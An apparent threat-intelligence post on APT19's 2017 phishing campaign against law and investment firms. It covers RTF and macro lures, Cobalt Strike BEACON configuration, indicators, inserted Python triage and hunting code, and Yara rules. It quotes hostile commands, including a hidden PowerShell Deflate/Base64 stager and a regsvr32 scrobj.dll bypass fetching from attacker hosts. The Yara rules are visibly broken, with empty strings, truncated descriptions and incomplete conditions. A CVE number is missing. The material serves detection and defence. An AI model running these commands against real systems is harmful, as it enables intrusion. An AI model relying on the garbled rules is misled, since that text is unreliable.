

In May and June 2017, FireEye observed a phishing campaign targeting
at least seven global law and investment firms. We have associated
this campaign with APT19, a group that we assess is composed of
freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise
targets. In early May, the phishing lures leveraged RTF attachments
that exploited the Microsoft Windows vulnerability described in CVE. Toward the end of May, APT19 switched to using
macro-enabled Microsoft Excel (XLSM) documents. In the most recent
versions, APT19 added an application whitelisting bypass to the XLSM
documents. At least one observed phishing lure delivered a Cobalt
Strike payload.

As of the writing of this blog post, FireEye had not observed
post-exploitation activity by the threat actors, so we cannot assess
the goal of the campaign. We have previously observed APT19 steal data
from law and investment firms for competitive economic purposes.

The purpose of this blog post is to inform law firms and investment
firms of this phishing campaign and provide technical indicators that
their IT personnel can use for proactive hunting and detection.

The Emails

APT19 phishing emails from this campaign originated from sender
email accounts from the “@cloudsend[.]net” domain and used a
variety of subjects and attachment names. Refer to the Indicators of
Compromise section for more details.

The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft
Excel (XLSM) files to deliver their initial exploits. The following
sections describe the two methods in further detail.

RTF Attachments

Through the exploitation of the HTA handler vulnerability described
in CVE-2017-0199,
the observed RTF attachments download
hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file
was no longer hosted at tk-in-f156.2bunny[.]com for further analysis.
Figure 1 is a screenshot of a packet capture showing one of the RTF
files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP
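As an added triage example (not code from the FireEye post), the following Python pulls the hex-encoded object data out of an RTF attachment's \objdata group, checks it for the OLE2Link marker that the RTF Yara rule at the end of this post encodes as 4f4c45324c696e6b, and recovers any UTF-16LE URL so an analyst can see where a lure points without opening it. The RTF sample, the lure.example.test host and the helper names are constructed; real lures may obfuscate the hex more heavily than this parser handles.

```python
import re

HEX_DIGITS = set("0123456789abcdefABCDEF")

def objdata_blobs(rtf):
    """Decode every {\\*\\objdata ...} group: keep only hex digits at the group's own
    brace depth (whitespace, line breaks and nested junk groups are ignored)."""
    for m in re.finditer(r"\\objdata\b", rtf):
        depth, buf, i = 0, [], m.end()
        while i < len(rtf):
            c = rtf[i]
            if c == "{":
                depth += 1
            elif c == "}":
                if depth == 0:
                    break
                depth -= 1
            elif depth == 0 and c in HEX_DIGITS:
                buf.append(c)
            i += 1
        hexstr = "".join(buf)
        if len(hexstr) >= 2:
            yield bytes.fromhex(hexstr[: len(hexstr) - len(hexstr) % 2])

# UTF-16LE "http(s)://..." run inside the decoded object data
URL_UTF16_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[!-~]\x00)+")

def triage_rtf(rtf):
    """Report whether any object carries the OLE2Link marker (the Yara rule's
    4f4c45324c696e6b) and list every UTF-16LE URL found in the object data."""
    report = {"ole2link": False, "urls": []}
    for blob in objdata_blobs(rtf):
        if b"OLE2Link" in blob:
            report["ole2link"] = True
        report["urls"] += [u.decode("utf-16-le") for u in URL_UTF16_RE.findall(blob)]
    return report

# Constructed lure: OLE2Link object data with a placeholder URL, hex-encoded with line
# breaks and a nested junk group, the kind of spacing the Yara rule's fragmented strings allow for.
_OBJ = (b"OLE2Link\x00" + b"\x00" * 8
        + "http://lure.example.test/Agreement.doc".encode("utf-16-le") + b"\x00\x00")
_HEX = _OBJ.hex()
SAMPLE_RTF = (r"{\rtf1{\object\objautlink\objupdate{\*\objclass Word.Document.8}{\*\objdata "
              + "\n".join(_HEX[i:i + 16] for i in range(0, len(_HEX), 16))
              + r"{\*\junk 0}}}}")

if __name__ == "__main__":
    print(triage_rtf(SAMPLE_RTF))
```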

XLSM Attachments

The XLSM attachments contained multiple worksheets with content that
reflected the attachment name. The attachments also contained an image
that requested the user to “Enable Content”, which would enable macro
support if it was disabled. Figure 2 provides a screenshot of one of
the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a
macro that:

  1. Determined the system architecture to select the correct path
    for PowerShell
  2. Launched a ZLIB compressed and Base64
    encoded command with PowerShell. This is a typical technique used by
    Meterpreter stagers.

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSX Macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

The shellcode invokes PowerShell to issue an HTTP GET request for a
random four-character URI on the root of
autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP
headers because the PowerShell command is executed with mostly default
parameters. Figure 5 depicts an HTTP GET request generated by the
payload, with minimal HTTP headers.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable
characters provides a quick way to pull out network-based indicators
(NBI) from the shellcode. Figure 6 shows the extracted NBIs.

Figure 6: Decoded shellcode
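Added example, not code from the FireEye post: a Python decoder for the Base64 + Deflate one-liner described above that inflates the blob the way IO.Compression.DeflateStream does (raw Deflate, no zlib header) and then applies the printable-strings trick from Figure 6 to pull NBIs out of either the decoded script or raw shellcode bytes. The sample script, the autodiscover.example.test host and the function names are constructed for this illustration.

```python
import base64
import re
import zlib

# Constructed inner script standing in for the decoded payload (Figure 4);
# the host is a placeholder, not the campaign's C2.
SAMPLE_SCRIPT = "$c = New-Object Net.WebClient\n$c.DownloadString('http://autodiscover.example.test/K5om')\n"

def make_sample_cmdline(script):
    """Wrap a script the way the macro's one-liner does (raw Deflate, then Base64),
    mirroring the powershell.exe HBI on this page; used here only as test input."""
    z = zlib.compressobj(9, zlib.DEFLATED, -15)     # -15 = raw Deflate, as DeflateStream
    blob = base64.b64encode(z.compress(script.encode()) + z.flush()).decode()
    return ("powershell.exe -NoP -NonI -W Hidden -Command \"Invoke-Expression "
            "$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
            "($(New-Object IO.MemoryStream ,$([Convert]::FromBase64String('" + blob +
            "')))), [IO.Compression.CompressionMode]::Decompress)), "
            "[Text.Encoding]::ASCII)).ReadToEnd();\"")

B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")

def decode_stager(cmdline):
    """Recover the plaintext: pull the Base64 blob, then inflate it as raw Deflate.
    A zlib- or gzip-wrapped blob fails here, which itself tells the analyst the
    sample does not use the DeflateStream pattern."""
    m = B64_RE.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String(...) blob in command line")
    return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("ascii", "replace")

# Printable runs of at least 4 bytes (strings-style), then URL- or host-like tokens in them.
PRINTABLE_RE = re.compile(rb"[ -~]{4,}")
NBI_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?(?:/[A-Za-z0-9._/-]*)?"
                    r"|\b[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.(?:com|net|org|info|test)\b")

def extract_nbis(data):
    """NBI extraction from raw shellcode bytes or a decoded script (the Figure 6 approach)."""
    found = []
    for run in PRINTABLE_RE.findall(data):
        for token in NBI_RE.findall(run.decode("ascii")):
            if token not in found:
                found.append(token)
    return found

if __name__ == "__main__":
    script = decode_stager(make_sample_cmdline(SAMPLE_SCRIPT))
    print(script)
    print(extract_nbis(script.encode()))
```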

FireEye also identified an alternate macro in some of the XLSM
documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey
Smith’s “Squiblydoo” Application Whitelisting bypass
to run the command in Figure 8.

Figure 8: Application Whitelisting Bypass

The command in Figure 8 downloads and launches code within an SCT
file. The SCT file in the payload (MD5:
1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the “$DoIt” string,
which is usually indicative of a Cobalt Strike payload.

Figure 10: Decoded SCT contents

A quick conversion of the contents of the variable “$var_code” from
Base64 to ASCII shows some familiar network indicators, shown in
Figure 11.

Figure 11: $var_code to ASCII

Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a
typical Cobalt Strike BEACON payload, configured with the following parameters:

  • Process Inject Targets:
    • %windir%\syswow64\rundll32.exe
    • %windir%\sysnative\rundll32.exe
  • c2_user_agents
    • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • Named Pipes
    • \\%s\pipe\msagent_%x
  • beacon_interval
    • 60
  • C2
    • autodiscover.2bunny[.]com/submit.php
    • autodiscover.2bunny[.]com/IE9CompatViewList.xml
    • sfo02s01-in-f2.cloudsend[.]net/submit.php
    • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • C2 Port
    • TCP/80

Figure 12 depicts an example of a BEACON C2 attempt from this payload.

Figure 12: Cobalt Strike BEACON C2

FireEye Product Detections

The following FireEye products currently detect and block the
methods described above. Table 1 lists the current detection and
blocking capabilities by product.

Detection names (the per-product columns of Table 1 are not recoverable from this copy):

  • XSLM Macro launch
  • XSLM Macro launch
  • Malware Object
  • BEACON written to disk
  • BEACON Callback

Table 1: Detection review

*Appliances must be configured for block mode.


FireEye recommends organizations perform the following steps to
mitigate the risk of this campaign:

  1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already installed it.
  2. Search historic and future emails that match the included indicators of compromise.
  3. Review web proxy logs for connections to the included network based indicators of compromise.
  4. Block connections to the included fully qualified domain names.
  5. Review endpoints for the included host based indicators of compromise.

Indicators of Compromise

The following section provides the IOCs for the variants of the
phishing emails and malicious payloads that FireEye has observed
during this campaign.

Email Senders

  • PressReader <infodept@cloudsend[.]net>
  • Angela Suh <angela.suh@cloudsend[.]net>
  • Ashley Safronoff
  • Lindsey Hersh
  • Sarah Roberto
  • noreply@cloudsend[.]net

Email Subject Lines

  • Macron Denies Authenticity Of Leak, French Prosecutors Open
  • Macron Document Leaker Releases New Images, Promises More Information
  • Are Emmanuel Macron’s Tax Evasion Documents Real?
  • Time Allocation
  • Vacancy
  • china paper table and graph
  • results with zeros – some ready not all finished
  • Macron Leaks contain secret plans for the islamisation of France and Europe

Attachment Names

  • Macron_Authenticity.doc.rtf
  • Macron_Information.doc.rtf
  • US and EU Trade with China and China CA.xlsm
  • Tables 4 5 7 Appendix with zeros.xlsm
  • Project Codes – 05.30.17.xlsm
  • Weekly Vacancy Status Report 5-30-15.xlsm
  • Macron_Tax_Evasion.doc.rtf
  • Macron_secret_plans.doc.rtf

Network Based Indicators (NBI)
Host Based Indicators (HBI)

RTF MD5 hash values

  • 0bef39d0e10b1edfe77617f494d733a8
  • 0e6da59f10e1c4685bb5b35a30fc8fb6
  • cebd0e9e05749665d893e78c452607e2

XLSX MD5 hash values

  • 38125a991efc6ab02f7134db0ebe21b6
  • 3a1dca21bfe72368f2dd46eb4d9b48c4
  • 30f149479c02b741e897cdb9ecd22da7

BEACON and Meterpreter payload MD5 hash values

  • bae0b39197a1ac9e24bdf9a9483b18ea
  • 1151619d06a461456b310096db6bc548

Process arguments, named pipes, and file paths

  • powershell.exe -NoP -NonI -W Hidden -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
  • regsvr32.exe /s /n /u /i:hxxps:// scrobj.dll
  • \\<ip>\pipe\msagent_<4 digits>
  • C:\Documents and Settings\<user>\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original GET request)
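To turn the process arguments and pipe names above into a hunt, here is an added Python example (not from the original post) that runs three checks over constructed Sysmon-style events: the -NoP -NonI -W Hidden DeflateStream stager, the regsvr32 /i:<url> scrobj.dll launch, and the msagent_ named pipe. The events, hosts, pipe suffix and rule names are constructed; the patterns themselves come from the indicator list.

```python
import re

# Constructed Sysmon-style events as (kind, text): process-creation command lines and
# named-pipe names. Hosts and pipe suffixes are placeholders, not real infrastructure.
SAMPLE_EVENTS = [
    ("process", "powershell.exe -NoP -NonI -W Hidden -Command \"Invoke-Expression "
                "$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
                "($(New-Object IO.MemoryStream ,$([Convert]::FromBase64String('QUFB'))))\""),
    ("process", "regsvr32.exe /s /n /u /i:https://autodiscover.example.test/IE9CompatViewList.xml scrobj.dll"),
    ("pipe", r"\msagent_3f2a"),                                                 # Sysmon PipeName form
    ("process", "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"),  # benign
    ("process", r"regsvr32.exe /s C:\Program Files\Vendor\lib.dll"),            # benign
    ("pipe", r"\PSHost.1234.5678.DefaultAppDomain.powershell"),                  # benign
]

RULES = {
    "process": {
        # -NoP -NonI -W Hidden plus the DeflateStream/FromBase64String chain from the HBI list
        "powershell_deflate_stager": re.compile(
            r"(?i)powershell.*-NoP\b.*-NonI\b.*-W\s+Hidden.*IO\.Compression\.DeflateStream.*FromBase64String"),
        # regsvr32 /s /n /u /i:<url> scrobj.dll (the Figure 8 bypass)
        "regsvr32_squiblydoo": re.compile(
            r"(?i)\bregsvr32(?:\.exe)?\b.*\s/s\b.*\s/i:https?://\S+.*\bscrobj\.dll"),
    },
    "pipe": {
        # BEACON's %s\pipe\msagent_%x: "msagent_" followed by a short hex suffix
        "beacon_msagent_pipe": re.compile(r"(?i)\\msagent_[0-9a-f]{1,8}$"),
    },
}

def scan(events):
    """Return {event_index: [rule names]} for every event that hits at least one rule
    of its kind; events of unknown kinds are skipped rather than raising."""
    hits = {}
    for i, (kind, text) in enumerate(events):
        names = [n for n, rx in RULES.get(kind, {}).items() if rx.search(text)]
        if names:
            hits[i] = names
    return hits

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, names, SAMPLE_EVENTS[idx][1][:60])
```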
Yara Rules

// Rule 1: macro whose strings are assembled with ChrW(). $ob1..$ob8 spell out, ten
// characters at a time, the regsvr32 /s /n /u /i:https://lyncdiscover.2bunny[.]com/Autodiscover scrobj.dll command from Figure 8.
    meta:
        author = "@TekDefense"
        description = "This rule is designed to identify macros with the specific encoding used in the sample
    strings:
        $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
        $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
        $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii
        $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
        $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
        $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
        $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii
        $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
        $obreg1 =
        $obreg2 =
        // wscript
        $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii
        $wsobj2 = "Obj.Run " ascii
    condition:
        (uint16(0) != 0x5A4D)
        all of ($wsobj*) and 3 of
        all of ($wsobj*) and all of ($obreg*)


// Rule 2: environment setup and PowerShell command fragments from the macro in Figure 3.
    meta:
        author = "@TekDefense"
        description = "rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX
    strings:
        // Setting the environment
        $env1 =
        $env2 = "windir = Environ(\"windir\")" ascii wide
        $env3 = "windir +
        ascii wide
        // powershell command fragments
        $ps1 = "-NoP" ascii wide
        $ps2 = "-NonI" ascii wide
        $ps3 = "-W Hidden" ascii wide
        $ps4 = "-Command" ascii wide
        $ps5 = "New-Object IO.StreamReader" ascii wide
        $ps6 = "IO.Compression.DeflateStream" ascii wide
        $ps7 = "IO.MemoryStream" ascii wide
        $ps8 = ",$([Convert]::FromBase64String" ascii wide
        $ps9 = "ReadToEnd();" ascii wide
        $psregex1 = /\W\w+\s+\s".+"/
    condition:
        (uint16(0) != 0x5A4D)
        all of ($env*) and 6 of ($ps*)
        all of ($env*) and 4 of ($ps*) and all of


// Rule 3: RTF lure. The $encoded strings are hex-encoded object data: "OLE2Link" (ASCII),
// "ObjInfo" and "Ole" (UTF-16LE); the $http and $domain fragments match the hex with inserted braces.
    meta:
        description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain
    strings:
        $header =
        $lnkinfo =
        $encoded1 = "4f4c45324c696e6b"              // OLE2Link
        $encoded2 =
        $encoded3 = "4f0062006a0049006e0066006f"    // O.b.j.I.n.f.o (UTF-16LE)
        $encoded4 = "4f006c0065"                    // O.l.e (UTF-16LE)
        $http1 =
        $http2 = "74{"
        $http3 = "07{"
        $domain1 = "32{"
        $domain2 = "62{"
        $domain3 =
        $domain4 =
        $domain5 =
        $domain6 =
        $domain7 =
        $domain8 =
        $domain9 =
        $datastore =
    condition:
        $header at 0 and all of them


Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms,
Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer
